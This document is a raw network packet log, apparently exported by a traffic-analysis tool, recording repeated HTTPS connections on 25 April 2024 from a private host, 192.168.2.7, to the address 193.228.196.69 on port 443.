Apr 25, 2024 14:22:55.198935986 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.201800108 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.201812983 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.616308928 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.618562937 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.618577957 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.618655920 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.618662119 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.622726917 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.622857094 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.624120951 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.624336004 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.624505043 CEST	443	49772	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:55.624773026 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:56.649527073 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:56.649564028 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:56.649646044 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:56.650324106 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:56.650340080 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.067110062 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.067378044 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.067399025 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.067533970 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.067540884 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.071225882 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.071290970 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.071752071 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.071943998 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.072160006 CEST	443	49773	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.072210073 CEST	49773	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.955806017 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.955894947 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:57.956307888 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.956984043 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:57.957020044 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.372821093 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.373058081 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:58.373085022 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.373152018 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:58.373159885 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.376738071 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.376812935 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:58.377283096 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:58.377482891 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:58.377630949 CEST	443	49774	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:58.377690077 CEST	49774	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.313534975 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.313590050 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.313664913 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.314199924 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.314229965 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.730550051 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.730782032 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.730813980 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.730839014 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.730845928 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.734435081 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.734528065 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.734898090 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.735172987 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:59.735244036 CEST	443	49775	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:59.735317945 CEST	49775	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:00.872373104 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:00.872409105 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:00.872586012 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:00.873200893 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:00.873217106 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.297319889 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.297518015 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:01.297529936 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.297558069 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:01.297561884 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.301120996 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.301378012 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:01.301770926 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:01.301770926 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:01.302098036 CEST	443	49776	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:01.303980112 CEST	49776	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.205648899 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.205698013 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.205816984 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.226857901 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.226882935 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.642524004 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.769891024 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.769926071 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.770066023 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.770072937 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.773773909 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.773807049 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.773840904 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.781351089 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.781778097 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:02.781843901 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.805474043 CEST	49777	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:02.805502892 CEST	443	49777	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.009021044 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.009058952 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.009130001 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.010118961 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.010129929 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.425019979 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.425252914 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.425262928 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.425385952 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.425391912 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.428988934 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.429147959 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.429594994 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.429594994 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:05.429935932 CEST	443	49778	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:05.430155993 CEST	49778	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.333374977 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.333419085 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.333503962 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.333946943 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.333964109 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.749775887 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.749917984 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.749946117 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.749993086 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.750004053 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.754621029 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.754686117 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.755182981 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.755300045 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:06.755542994 CEST	443	49779	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:06.755599976 CEST	49779	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:07.737907887 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:07.737962008 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:07.738360882 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:07.738925934 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:07.738941908 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.153920889 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.154267073 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:08.154284000 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.154428959 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:08.154434919 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.155901909 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.156356096 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:08.156492949 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:08.156492949 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:08.156660080 CEST	443	49780	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:08.158804893 CEST	49780	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.232026100 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.232114077 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.232311010 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.232882023 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.232917070 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.646127939 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.646450996 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.646487951 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.646536112 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.646548033 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.648013115 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.648154020 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.648716927 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.648718119 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:09.648901939 CEST	443	49781	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:09.649271011 CEST	49781	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:10.864936113 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:10.864960909 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:10.865056992 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:10.865732908 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:10.865746975 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.278765917 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.279048920 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:11.279056072 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.279192924 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:11.279196978 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.280689001 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.280822039 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:11.281512976 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:11.281512976 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:11.281677008 CEST	443	49782	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:11.281789064 CEST	49782	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.116166115 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.116214991 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.116305113 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.117147923 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.117165089 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.536370039 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.536546946 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.536566973 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.536621094 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.536628008 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.537642002 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.537710905 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.538144112 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.538269043 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.538290977 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:12.538300991 CEST	443	49783	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:12.538322926 CEST	49783	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.533181906 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.533222914 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.533430099 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.534502983 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.534518003 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.950704098 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.952500105 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.952500105 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.952519894 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.952538967 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.953556061 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.953774929 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.959579945 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.959717035 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.959758043 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:13.959765911 CEST	443	49784	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:13.959789991 CEST	49784	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.349988937 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.350028038 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.350204945 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.354273081 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.354290962 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.767129898 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.770255089 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.770275116 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.770323992 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.770328999 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.771217108 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.771378040 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.771857977 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.771857977 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:15.771985054 CEST	443	49785	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:15.774821043 CEST	49785	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.102610111 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.102643967 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.102714062 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.103068113 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.103082895 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.523561001 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.526336908 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.526348114 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.526504040 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.526509047 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.527457952 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.527590036 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.528162003 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.528162003 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:17.528292894 CEST	443	49786	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:17.528450012 CEST	49786	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.544200897 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.544295073 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.544387102 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.544909000 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.544943094 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.957680941 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.961658001 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.961718082 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.961858034 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.961872101 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.962933064 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.963011026 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.973743916 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.973824024 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:18.973939896 CEST	443	49787	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:18.973994017 CEST	49787	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:21.831782103 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:21.831819057 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:21.832031012 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:21.832735062 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:21.832761049 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.245364904 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.249984026 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:22.249994993 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.250124931 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:22.250130892 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.251245975 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.251295090 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:22.252650976 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:22.252774000 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:22.252794027 CEST	443	49788	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:22.252841949 CEST	49788	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.529470921 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.529522896 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.529803991 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.530348063 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.530361891 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.950648069 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.950860977 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.950881958 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.951067924 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.951072931 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.951976061 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.952023983 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.952663898 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.952784061 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.952797890 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:23.952802896 CEST	443	49789	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:23.952836037 CEST	49789	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.138870955 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.138957977 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.139041901 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.139473915 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.139502048 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.554862022 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.556340933 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.556360006 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.556864977 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.556870937 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.558358908 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.558497906 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.559078932 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.559078932 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:25.559257984 CEST	443	49790	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:25.559691906 CEST	49790	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.323981047 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.324081898 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.324162960 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.324670076 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.324704885 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.738714933 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.738878965 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.738903999 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.738924026 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.738928080 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.740390062 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.740453959 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.740828037 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.740909100 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:26.740986109 CEST	443	49791	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:26.741029024 CEST	49791	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:27.639785051 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:27.639828920 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:27.642359018 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:27.643574953 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:27.643594027 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.061656952 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.061983109 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:28.062005043 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.062068939 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:28.062086105 CEST	443	49792	193.228.196.69	192.168.2.7
